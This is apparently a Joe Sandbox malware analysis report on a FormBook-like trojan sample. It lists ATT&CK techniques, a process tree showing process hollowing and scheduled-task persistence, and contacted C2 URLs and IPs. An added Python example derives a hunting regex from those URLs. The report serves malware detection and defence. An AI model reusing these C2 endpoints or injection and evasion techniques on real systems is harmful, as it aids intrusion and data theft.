Defense Evasion: Masquerading 1; Disable or Modify Tools 1; Virtualization/Sandbox Evasion 31; Process Injection 612; Deobfuscate/Decode Files or Information 11; Obfuscated Files or Information 4; Software Packing 13; Timestomp 1; File Deletion 1
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: Security Software Discovery 221; Process Discovery 2; Virtualization/Sandbox Evasion 31; Remote System Discovery 1; File and Directory Discovery 1; System Information Discovery 112; Network Sniffing; Network Service Scanning; System Network Connections Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
Collection: Archive Collected Data 11; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel 1; Ingress Tool Transfer 3; Non-Application Layer Protocol 3; Application Layer Protocol 13; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings
Impact: Modify System Partition; Device Lockout; Delete Device Data; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction

          Behavior Graph

Behavior Graph ID: 483617; Sample: tgamf4XuLa; Start date: 15/09/2021; Architecture: WINDOWS; Score: 100

Sample-level DNS/IP info: www.realstylecelebz.com; www.dressmids.com; 2 other IPs or domains
Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures

Process tree:

tgamf4XuLa.exe (started)
    dropped: C:\Users\user\AppData\Roaming\HpnpObXJP.exe (PE32)
    dropped: C:\Users\...\HpnpObXJP.exe:Zone.Identifier (ASCII)
    dropped: C:\Users\user\AppData\Local\...\tmpEC5E.tmp (XML)
    dropped: C:\Users\user\AppData\...\tgamf4XuLa.exe.log (ASCII)
    signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign process
    +-- tgamf4XuLa.exe (started)
    |       signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
    |       +-- explorer.exe (injected)
    |               DNS/IP: www.syzhtr.com 103.72.144.19, port 49789 -> 80, UHGL-AS-AP UCloud HK Holdings Group Limited, China
    |               DNS/IP: www.discomountainkombucha.com 91.195.240.94, ports 49788 and 49793 -> 80, SEDO-AS, Germany
    |               DNS/IP: 12 other IPs or domains
    |               signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation
    |               +-- control.exe (started)
    |                       signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
    |                       +-- cmd.exe (started)
    |                               +-- conhost.exe (started)
    +-- schtasks.exe (started)
            +-- conhost.exe (started)


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
tgamf4XuLa.exe | 100% | Joe Sandbox ML | -

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\HpnpObXJP.exe | 100% | Joe Sandbox ML | -

Unpacked PE Files

Source | Detection | Scanner | Label
6.2.tgamf4XuLa.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://www.hellocharmaine.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=HiF2JmV2owPq8HevY+6PLH0l3KgiDbtf8XOoOMXvRXgVDxDLxjWebHI9Pw488vMk9ORY | 0% | Avira URL Cloud | safe
http://www.cherrybunk.life/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=xxaskX4zCBVE3yBbpvO7oTQxeCyuhPQrJ3bXakBVisDWUfPX6szXkiX7lnBBy6F9sRNz | 0% | Avira URL Cloud | safe
http://www.syzhtr.com/vuja/?a6PLdH6=u+wR1aKzpDV/TxGllf2QnEgeBGa/HBhCNRhMkmFjTPYp6U2j3/+A9H921q8yWaN2LpI/&SrK0m=8pbLu8l0SV1lo | 0% | Avira URL Cloud | safe
http://www.d0berman245.xyz/vuja/?a6PLdH6=knesP9qPdEIwhrsdCBVrK6TYPa8ARfupLdS+O1KjpVkHadf5O3a6XCWpr2FomIuS86ow&SrK0m=8pbLu8l0SV1lo | 0% | Avira URL Cloud | safe
http://www.fraktal.media/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=+jKwoP3rxSUE2G3GWZal8U7hYP6reGb39kDXBTdBOy+lOhqfFK02kSVdLKlhCp2Y/9bB | 0% | Avira URL Cloud | safe
https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png | 0% | Avira URL Cloud | safe
http://www.realstylecelebz.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=mvPzLoePd3E50JyZDmieD6pkHjcUl/YW6tCUslk4/nfE0VzZdnTMarol9oC9qsPy2Se0 | 0% | Avira URL Cloud | safe
http://www.dressmids.com/vuja/?a6PLdH6=mgzvXufYj6psHtNzSOMfQOc1unGQJGuCHGGdhDQCsGfwe59mkNL58xvD94UsnjjJj5NK&SrK0m=8pbLu8l0SV1lo | 0% | Avira URL Cloud | safe
http://www.tjandamber.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=O/mUfy2FFtS6I/aReU4qHel2aPwRekNUtr7VAEKDTW8BEYcE6LKZB1SF0N7UsHI7MTf5 | 0% | Avira URL Cloud | safe
www.dressmids.com/vuja/ | 0% | Avira URL Cloud | safe
http://www.discomountainkombucha.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=vHKhDfdz3QjyoUuaK0fKX3k6vNUdxhN00gDlJT2hTfXNtdoBfWWdNbHAMnY3fHnn7Aqd | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus detection | Reputation
fraktal.media | 34.98.99.30 | true | false | - | unknown
www.cherrybunk.life | 52.25.92.0 | true | true | - | unknown
www.hellocharmaine.com | 91.195.240.94 | true | true | - | unknown
www.syzhtr.com | 103.72.144.19 | true | true | - | unknown
expertexceleratorchallenge.com | 34.98.99.30 | true | false | - | unknown
www.d0berman245.xyz | 99.83.154.118 | true | true | - | unknown
www.realstylecelebz.com | 99.83.154.118 | true | true | - | unknown
dressmids.com | 34.98.99.30 | true | false | - | unknown
www.discomountainkombucha.com | 91.195.240.94 | true | true | - | unknown
tjandamber.com | 34.102.136.180 | true | false | - | unknown
www.tjandamber.com | unknown | unknown | true | - | unknown
www.fraktal.media | unknown | unknown | true | - | unknown
www.expertexceleratorchallenge.com | unknown | unknown | true | - | unknown
www.dressmids.com | unknown | unknown | true | - | unknown

                                      Contacted URLs

Name | Malicious | Antivirus detection | Reputation
http://www.hellocharmaine.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=HiF2JmV2owPq8HevY+6PLH0l3KgiDbtf8XOoOMXvRXgVDxDLxjWebHI9Pw488vMk9ORY | true | Avira URL Cloud: safe | unknown
http://www.cherrybunk.life/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=xxaskX4zCBVE3yBbpvO7oTQxeCyuhPQrJ3bXakBVisDWUfPX6szXkiX7lnBBy6F9sRNz | true | Avira URL Cloud: safe | unknown
http://www.syzhtr.com/vuja/?a6PLdH6=u+wR1aKzpDV/TxGllf2QnEgeBGa/HBhCNRhMkmFjTPYp6U2j3/+A9H921q8yWaN2LpI/&SrK0m=8pbLu8l0SV1lo | true | Avira URL Cloud: safe | unknown
http://www.d0berman245.xyz/vuja/?a6PLdH6=knesP9qPdEIwhrsdCBVrK6TYPa8ARfupLdS+O1KjpVkHadf5O3a6XCWpr2FomIuS86ow&SrK0m=8pbLu8l0SV1lo | true | Avira URL Cloud: safe | unknown
http://www.fraktal.media/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=+jKwoP3rxSUE2G3GWZal8U7hYP6reGb39kDXBTdBOy+lOhqfFK02kSVdLKlhCp2Y/9bB | false | Avira URL Cloud: safe | unknown
http://www.realstylecelebz.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=mvPzLoePd3E50JyZDmieD6pkHjcUl/YW6tCUslk4/nfE0VzZdnTMarol9oC9qsPy2Se0 | true | Avira URL Cloud: safe | unknown
http://www.dressmids.com/vuja/?a6PLdH6=mgzvXufYj6psHtNzSOMfQOc1unGQJGuCHGGdhDQCsGfwe59mkNL58xvD94UsnjjJj5NK&SrK0m=8pbLu8l0SV1lo | false | Avira URL Cloud: safe | unknown
http://www.tjandamber.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=O/mUfy2FFtS6I/aReU4qHel2aPwRekNUtr7VAEKDTW8BEYcE6LKZB1SF0N7UsHI7MTf5 | false | Avira URL Cloud: safe | unknown
www.dressmids.com/vuja/ | true | Avira URL Cloud: safe | low
http://www.discomountainkombucha.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=vHKhDfdz3QjyoUuaK0fKX3k6vNUdxhN00gDlJT2hTfXNtdoBfWWdNbHAMnY3fHnn7Aqd | true | Avira URL Cloud: safe | unknown
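Every contacted URL in the table above shares the path /vuja/ and the query keys SrK0m and a6PLdH6; SrK0m carries the same value on all nine hosts while a6PLdH6 differs per request. The Python below is an added example (not Joe Sandbox's code and not the sample's) that parses the ten URLs from the table, derives that shared shape as a per-build signature, emits a hunting regex from it, and classifies new URLs against it. The example.com test URLs, the function names and the "full"/"path" labels are constructed for the example. Because the associated samples listed in the context section at the end of this report use different path tokens (pm7s, b6cu, i7dg, ...), the signature identifies this build rather than FormBook as a family; and because the list mixes decoy and parked domains with the live C2, a match is a campaign indicator, not confirmation that the host is attacker-controlled.

```python
import re
from dataclasses import dataclass
from typing import Dict, FrozenSet, List, Optional
from urllib.parse import urlsplit

# The ten entries of the report's "Contacted URLs" table, copied as printed.
REPORT_URLS = [
    "http://www.hellocharmaine.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=HiF2JmV2owPq8HevY+6PLH0l3KgiDbtf8XOoOMXvRXgVDxDLxjWebHI9Pw488vMk9ORY",
    "http://www.cherrybunk.life/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=xxaskX4zCBVE3yBbpvO7oTQxeCyuhPQrJ3bXakBVisDWUfPX6szXkiX7lnBBy6F9sRNz",
    "http://www.syzhtr.com/vuja/?a6PLdH6=u+wR1aKzpDV/TxGllf2QnEgeBGa/HBhCNRhMkmFjTPYp6U2j3/+A9H921q8yWaN2LpI/&SrK0m=8pbLu8l0SV1lo",
    "http://www.d0berman245.xyz/vuja/?a6PLdH6=knesP9qPdEIwhrsdCBVrK6TYPa8ARfupLdS+O1KjpVkHadf5O3a6XCWpr2FomIuS86ow&SrK0m=8pbLu8l0SV1lo",
    "http://www.fraktal.media/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=+jKwoP3rxSUE2G3GWZal8U7hYP6reGb39kDXBTdBOy+lOhqfFK02kSVdLKlhCp2Y/9bB",
    "http://www.realstylecelebz.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=mvPzLoePd3E50JyZDmieD6pkHjcUl/YW6tCUslk4/nfE0VzZdnTMarol9oC9qsPy2Se0",
    "http://www.dressmids.com/vuja/?a6PLdH6=mgzvXufYj6psHtNzSOMfQOc1unGQJGuCHGGdhDQCsGfwe59mkNL58xvD94UsnjjJj5NK&SrK0m=8pbLu8l0SV1lo",
    "http://www.tjandamber.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=O/mUfy2FFtS6I/aReU4qHel2aPwRekNUtr7VAEKDTW8BEYcE6LKZB1SF0N7UsHI7MTf5",
    "www.dressmids.com/vuja/",
    "http://www.discomountainkombucha.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=vHKhDfdz3QjyoUuaK0fKX3k6vNUdxhN00gDlJT2hTfXNtdoBfWWdNbHAMnY3fHnn7Aqd",
]


@dataclass
class C2Url:
    host: str
    path: str
    params: Dict[str, str]  # raw query values: they are base64-like, so never unquote them


@dataclass
class Signature:
    path: str                  # path token shared by every host
    keys: FrozenSet[str]       # query keys present on every host that sent a query
    constants: Dict[str, str]  # keys whose value never changes across hosts
    hosts: List[str]


def parse_c2(url: str) -> C2Url:
    # One report entry has no scheme ("www.dressmids.com/vuja/"); treat it as http.
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    params: Dict[str, str] = {}
    pairs = parts.query.split("&") if parts.query else []
    for pair in pairs:
        key, _, value = pair.partition("=")
        params[key] = value
    return C2Url(host=parts.hostname or "", path=parts.path, params=params)


def derive_signature(urls: List[str]) -> Signature:
    parsed = [parse_c2(u) for u in urls]
    paths = {p.path for p in parsed}
    if len(paths) != 1:
        raise ValueError(f"URLs do not share one path: {sorted(paths)}")
    with_query = [p for p in parsed if p.params]
    keys = frozenset.intersection(*(frozenset(p.params) for p in with_query))
    first = with_query[0]
    constants = {k: first.params[k] for k in keys
                 if all(p.params[k] == first.params[k] for p in with_query)}
    return Signature(paths.pop(), keys, constants, sorted({p.host for p in parsed}))


def classify(url: str, sig: Signature) -> Optional[str]:
    """'full' when path, shared keys and pinned constants all agree; 'path' for a
    query-less hit on the campaign path alone; None otherwise."""
    p = parse_c2(url)
    if p.path != sig.path:
        return None
    if not p.params:
        return "path"
    if not sig.keys <= frozenset(p.params):
        return None
    if any(p.params.get(k) != v for k, v in sig.constants.items()):
        return None
    return "full"


def to_regex(sig: Signature) -> str:
    """Hunting regex: campaign path, every shared key present, constant keys pinned."""
    lookaheads = ""
    for k in sorted(sig.keys):
        if k in sig.constants:
            lookaheads += rf"(?=.*[?&]{re.escape(k)}={re.escape(sig.constants[k])}(?:&|$))"
        else:
            lookaheads += rf"(?=.*[?&]{re.escape(k)}=)"
    return rf"^https?://[^/]+{re.escape(sig.path)}(?=\?){lookaheads}"


def matches_regex(url: str, sig: Signature) -> bool:
    return re.search(to_regex(sig), url) is not None


if __name__ == "__main__":
    sig = derive_signature(REPORT_URLS)
    print("path:", sig.path, "keys:", sorted(sig.keys), "constants:", sig.constants)
    print("hosts:", ", ".join(sig.hosts))
    print("regex:", to_regex(sig))
    for u in REPORT_URLS:
        print(classify(u, sig), u)
```

The query values are split by hand rather than with urllib.parse.parse_qs because parse_qs would turn the '+' inside the a6PLdH6 values into spaces and percent-decode the '/' sequences, which breaks exact comparison of the pinned constant. The regex uses lookaheads so that key order does not matter; the table shows both SrK0m-first and a6PLdH6-first variants.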

                                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus detection | Reputation
https://www.value-domain.com/ | control.exe, 00000014.00000002.507841513.0000000005712000.00000004.00020000.sdmp | false | - | high
https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png | control.exe, 00000014.00000002.507841513.0000000005712000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.value-domain.com/modall.php | control.exe, 00000014.00000002.507841513.0000000005712000.00000004.00020000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmp | false | - | high

                                            Contacted IPs

Public

IP | Domain | Country | ASN | ASN name | Malicious
91.195.240.94 | www.hellocharmaine.com | Germany | 47846 | SEDO-AS (DE) | true
52.25.92.0 | www.cherrybunk.life | United States | 16509 | AMAZON-02 (US) | true
34.102.136.180 | tjandamber.com | United States | 15169 | GOOGLE (US) | false
99.83.154.118 | www.d0berman245.xyz | United States | 16509 | AMAZON-02 (US) | true
34.98.99.30 | fraktal.media | United States | 15169 | GOOGLE (US) | false
103.72.144.19 | www.syzhtr.com | China | 135377 | UHGL-AS-AP UCloud HK Holdings Group Limited (HK) | true

Note: 91.195.240.94 belongs to SEDO-AS, Sedo's domain-parking range, and the same address recurs in the Joe Sandbox View / Context section below for many other FormBook samples. FormBook's configuration mixes its live C2 with decoy and expired domains, so a domain being resolved and contacted here is an indicator for this build, not proof that the host is attacker-controlled.

                                            Private

                                            IP
                                            192.168.2.1

                                            General Information

                                            Joe Sandbox Version:33.0.0 White Diamond
                                            Analysis ID:483617
                                            Start date:15.09.2021
                                            Start time:10:07:32
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 12m 2s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:tgamf4XuLa (renamed file extension from none to exe)
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:29
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@10/4@10/7
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 42.9% (good quality ratio 38%)
                                            • Quality average: 72.5%
                                            • Quality standard deviation: 32.7%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            Warnings:
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                            • TCP Packets have been reduced to 100
                                            • Excluded IPs from analysis (whitelisted): 92.122.145.220, 23.35.236.56, 20.50.102.62, 67.27.141.126, 8.248.119.254, 8.238.85.126, 8.248.139.254, 8.238.85.254, 40.112.88.60, 23.216.77.209, 23.216.77.208
                                            • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/483617/sample/tgamf4XuLa.exe

                                            Simulations

                                            Behavior and APIs

Time | Type | Description
10:08:32 | API Interceptor | 1x Sleep call for process: tgamf4XuLa.exe modified

                                            Joe Sandbox View / Context

                                            IPs

Match: 91.195.240.94

Associated sample | Detection | Context URL
Payment.exe | malicious | www.cevicheatl.com/pm7s/?v2J83=dDHD9XVxev94&-Zi=VaPpcx8n3Tp8D9xgbNtl8vulXgBvw8jFIvpULVCQhIlh0W4Hjuc6qrQSfYpFlZollCUL
pronto per il pagamento.exe | malicious | www.kosha2030.com/cb3b/?hV2=rqbUo6j2KmhlDLlvmj6v60cfZ8/2Wb9u+KYnQWuAInoB2FLYYFx1yPNzvLEIuH4s1sVu&2d_HDh=b4KXxR6XiV5lmHh0
PO-PT. Hextar-Sept21.xlsx | malicious | www.garfld.com/imi7/?bVx=AFMvowp2dypQPpLZR6/sAbLaaLiFVzdlH2gx+8GSqBhOmfQ8NBa2GdB0GH1Hzk2pvxNNYQ==&Nx=8pFdqHyxnZUl
P.O100%uFFFDpayment.doc__.rtf | malicious | www.cis-thailand.com/crg3/?9rWP=SnroaQgsYxMLiTImvCpI1Gl07kg1+3LZiriLgRT6WM6KSYrus5bHWYAPsUyD9HyCzSS3+w==&wTcHGb=ylr8U6ypj
Quotation Required Details.exe | malicious | www.promosplace.com/p4se/?l2Mdnb=g+K9AOIBn0/VHfOvEruut/gc0uElQ8afuAuUP1bYE2eC/PWXrO3ELwGMR3TL6eUTg0Vn&fFQL=6lZPcVbxGH
DUE INVOICES.exe | malicious | www.mgm2348543.com/b6cu/?R2MD6=dqsOYsWQq+FTU42PaO7UsXHrG00vcvVIPPyHFAmVRXCpjYXsaNa58d0J7fmeqANspZbM&BT=2dhhnfvPB6f8zBxp
Order_confirmation_ SMKT 09062021_.exe | malicious | www.preaked.com/h2m4/?2d=HxKWzMaF1BWGIaYUxE2WWBBllJBIGc2hs3LD5EFS7XDw0kpNhCyQgmCJtlxKKPUpl4+d&D2MH9=9rWdhfN8M
nFzJnfmTNh.exe | malicious | www.mgm2348543.com/b6cu/?aT=jvQLaT&MD=dqsOYsWQq+FTU42PaO7UsXHrG00vcvVIPPyHFAmVRXCpjYXsaNa58d0J7cGOlhdU38yL
0039234_00533MXS2.exe | malicious | www.dandhgh.com/m64e/?H2MDD=hQTNvBW47KQ9P36N1I31K6xMq6TLiyTboYpfo/Bbm9l3Z3kS2jzEmMODUoxriuOWTqDJ&DxoLn=7nU4v4ghr2A8WLZ
Unpaid Invoice.exe | malicious | www.mgm2348543.com/b6cu/?WFN=dqsOYsWQq+FTU42PaO7UsXHrG00vcvVIPPyHFAmVRXCpjYXsaNa58d0J7cGOlhdU38yL&Sjlpi=9ruD_h9
174jAWlXyW.exe | malicious | www.bharathub.net/b6cu/?f2M=_v-HI&9r=vUP3bPk6qVMFSBZsu0WoakUB9ZLAJM2aLct125UMa7nObtIS9UcRmSBQP/rfZ6EDwLD9
Payment Advice.xlsx | malicious | www.mgm2348543.com/b6cu/?O8=-ZcPjPvhqPppnvL&bzu4_=dqsOYsWVq5FXUo6DYO7UsXHrG00vcvVIPPqXZD6UV3Cojp7qddL1qZML45qYhxZn8/v7Kg==
RFQ_PO_009890_pdf.exe | malicious | www.swipehawk.com/a6hg/?Gz=UharbDuqOmkTaf35LjnpLxSjggODaklpW9Y+tG2s+LMkdYLf42pUDMwAxcb4x47jVGJ2VGfNbQ==&-ZsLG=3ff8xpG0DPWtZdZ
Swift Copy.exe | malicious | www.mgm2348543.com/b6cu/?2dSpM=dqsOYsWQq+FTU42PaO7UsXHrG00vcvVIPPyHFAmVRXCpjYXsaNa58d0J7cGOlhdU38yL&PVvtW=7nWhA
LC copy, Terms conditions.xlsx | malicious | www.wqfilter.com/i7dg/?BBJ43b=f8iD9L4afkGSBNeT1a2zV06Ib9jyqzB9Ki8lcYXtvMA4ssIJMUtZ9Lijkg3d2xO4598lPA==&4hExr=GBXdRHy8-0z0
Order sheet 31082021.exe | malicious | www.promosplace.com/p4se/?H0D=v48Tu4dpfV5&F8R8gJ=g+K9AOIBn0/VHfOvEruut/gc0uElQ8afuAuUP1bYE2eC/PWXrO3ELwGMR3TL6eUTg0Vn
PAYMENT INSTRUCTIONS COPY.exe | malicious | www.hostings.company/n58i/?7nxhvxdX=m2fUwKHXntk7+v0FXrNTEkwXJjJFTAENR7+CI2dV9M7+9BuBSatPMImaRSslo8DZxWmb&z0D83b=1butZX4hMzCL_
Shipment Advise 20035506.exe | malicious | www.hostings.company/n58i/?CRmti4J=m2fUwKHXntk7+v0FXrNTEkwXJjJFTAENR7+CI2dV9M7+9BuBSatPMImaRRAm0MPh83bNGIKsaA==&EDHH=SL3Xb8KPdN
PO 4100066995.exe | malicious | www.vaca.travel/bp39/?nVR=5Qm4YdS9nP4uT06ysd2e9bB4EWW6DLhAof8Noh1nKxRE1PX3o+aVuPjzTEVLAN9Xs7Ly&fFNDaX=7nmPgJPxr
uXNn71mPwRw5qVi.exe | malicious | www.anacshops.com/z01e/?9rgLWb38=UkWWCKefa2QBOILDZj1DEjSIa8P8jMrEvFnGp+Vhsnwupfyaki4wDZ8Hwm0s3MMh54tn&Sjlpd=9ruDZ

Every associated sample uses the same FormBook URL shape seen in this report (a short path token and two opaque query parameters) but with a different token per build, which is why this single parking address recurs across many FormBook samples.

                                            Domains

                                            No context

                                            ASN

Match | Associated Sample Name | Detection | Context
AMAZON-02 | USSRMETALINDUSTRIES.exe | malicious | 44.227.65.245
AMAZON-02 | PI L032452021xxls.exe | malicious | 99.83.154.118
AMAZON-02 | Unpaid invoice.exe | malicious | 99.83.154.118
AMAZON-02 | FaxGUO65DE.391343-Faa.html | malicious | 3.139.50.24
AMAZON-02 | FaxGUO65DE.391343-Faa.html | malicious | 3.139.50.24
AMAZON-02 | Elon Musk Club - 024705 .htm | malicious | 13.226.156.103
AMAZON-02 | PGQBjDmDZ4 | malicious | 34.249.145.219
AMAZON-02 | m5DozqUO2t | malicious | 54.70.167.99
AMAZON-02 | avxeC9Wssi | malicious | 13.52.148.225
AMAZON-02 | Wh3hrPWbBG | malicious | 34.249.145.219
AMAZON-02 | re2.x86 | malicious | 184.77.232.100
AMAZON-02 | re2.arm7 | malicious | 63.32.132.1
AMAZON-02 | Fourlokov9.x86 | malicious | 34.249.145.219
AMAZON-02 | re2.x86 | malicious | 54.96.126.50
AMAZON-02 | re2.arm | malicious | 18.226.174.198
AMAZON-02 | XbvAoRKnFm.exe | malicious | 52.218.0.168
AMAZON-02 | Enclosed.xlsx | malicious | 13.238.159.178
AMAZON-02 | HBW PAYMENT LIST FOR 2021,20210809.xlsx | malicious | 3.139.183.122
AMAZON-02 | debit.xlsx | malicious | 52.77.232.215
AMAZON-02 | UPDATED e-STATEMENT.exe | malicious | 75.2.37.224
SEDO-ASDE | Payment.exe | malicious | 91.195.240.94
SEDO-ASDE | PAYSLIP.exe | malicious | 91.195.240.117
SEDO-ASDE | UPDATED e-STATEMENT.exe | malicious | 91.195.240.87
SEDO-ASDE | 2021091400983746_pdf.exe | malicious | 91.195.240.13
SEDO-ASDE | pronto per il pagamento.exe | malicious | 91.195.240.94
SEDO-ASDE | ENQUIRYSMRT119862021-ERW PIPES.pdf.exe | malicious | 91.195.240.13
SEDO-ASDE | ryfAIJHmKETyAPz.exe | malicious | 91.195.240.87
SEDO-ASDE | NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | malicious | 91.195.240.117
SEDO-ASDE | PO-PT. Hextar-Sept21.xlsx | malicious | 91.195.240.94
SEDO-ASDE | P.O100%uFFFDpayment.doc__.rtf | malicious | 91.195.240.94
SEDO-ASDE | Data Sheet and Profile.exe | malicious | 91.195.240.117
SEDO-ASDE | Order 45789011.exe | malicious | 91.195.240.13
SEDO-ASDE | Quotation Required Details.exe | malicious | 91.195.240.94
SEDO-ASDE | 54U89TvWvD.exe | malicious | 91.195.240.87
SEDO-ASDE | Order no.1480-G22-21202109.xlsx | malicious | 91.195.240.117
SEDO-ASDE | BK8476699_BOOKING.exe | malicious | 91.195.240.87
SEDO-ASDE | Swift 07.09.21.exe | malicious | 91.195.240.87
SEDO-ASDE | Required quantity.doc | malicious | 91.195.240.117
SEDO-ASDE | chUG6brzt9.exe | malicious | 91.195.240.117
SEDO-ASDE | BahcfFNy25bmV1c.exe | malicious | 91.195.240.13

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tgamf4XuLa.exe.log
                                            Process:C:\Users\user\Desktop\tgamf4XuLa.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:modified
                                            Size (bytes):1216
                                            Entropy (8bit):5.355304211458859
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                            MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                            SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                            SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                            SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                            Malicious:true
                                            Reputation:high, very likely benign file
